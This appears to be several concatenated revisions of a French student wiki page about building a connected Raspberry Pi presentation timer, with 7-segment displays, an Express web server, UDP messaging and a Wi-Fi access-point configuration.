Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
==Séance 2==<br />
==Séance 3==<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49389P4 IOT 20182019-01-20T20:46:41Z<p>Mcreteur : /* Séance 1 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Suivi de réalisation==<br />
<br />
===Séance 1===<br />
<br />
====Recherche d'un sujet et clarification du cahier des charges====<br />
<br />
===Séance 2===<br />
===Séance 3===<br />
<br />
====Serveur web====<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
===Séance 4===<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
===Séance 5===<br />
<br />
====Configuration de la raspberry pi====<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49388P4 IOT 20182019-01-20T20:34:49Z<p>Mcreteur : /* Matériel utilisé */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Suivi de réalisation==<br />
<br />
===Séance 1===<br />
===Séance 2===<br />
===Séance 3===<br />
<br />
====Serveur web====<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
===Séance 4===<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
===Séance 5===<br />
<br />
====Configuration de la raspberry pi====<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49387P4 IOT 20182019-01-20T20:22:51Z<p>Mcreteur : /* Description du projet */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 4 afficheurs 7 segments<br />
* Une Raspberry pi 3<br />
* Des transistors PNP <br />
* Résistances<br />
* Multiplexeurs<br />
<br />
==Suivi de réalisation==<br />
<br />
===Séance 1===<br />
===Séance 2===<br />
===Séance 3===<br />
<br />
====Serveur web====<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
===Séance 4===<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
===Séance 5===<br />
<br />
====Configuration de la raspberry pi====<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49386P4 IOT 20182019-01-20T20:22:34Z<p>Mcreteur : /* Description du projet */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisée sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 4 afficheurs 7 segments<br />
* Une Raspberry pi 3<br />
* Des transistors PNP <br />
* Résistances<br />
* Multiplexeurs<br />
<br />
==Suivi de réalisation==<br />
<br />
===Séance 1===<br />
===Séance 2===<br />
===Séance 3===<br />
<br />
====Serveur web====<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
===Séance 4===<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
